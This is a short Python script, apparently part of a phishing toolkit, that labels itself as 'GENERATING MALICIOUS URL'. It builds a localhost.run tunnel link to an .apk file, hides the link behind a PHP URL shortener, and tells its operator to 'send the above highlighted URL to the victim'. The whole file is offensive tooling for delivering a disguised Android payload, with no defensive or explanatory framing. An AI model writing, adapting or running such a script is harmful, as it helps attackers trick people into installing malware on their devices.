import os
import re
os.system("clear")
print(">>>> GENERATING MALICIOUS URL <<<<<<<<<<")
os.system("whoami > whoami.txt")
whoami=open("whoami.txt","r")
user=whoami.read()
whoami.close()
shorten=open("url.txt","r+")
url_ssh=shorten.read()
url=url_ssh.strip()
urlre=re.compile(f"https://{user.strip()}-.....localhost.run")
urlstr=urlre.search(url)
shorten.close()
namefile=open("name.txt","r+")
name=namefile.read()
namefile.close()
os.system(f"php shorturl.php {urlstr.group()}/{name.strip()}.apk")
print("send the above highlighted URL to the victim")
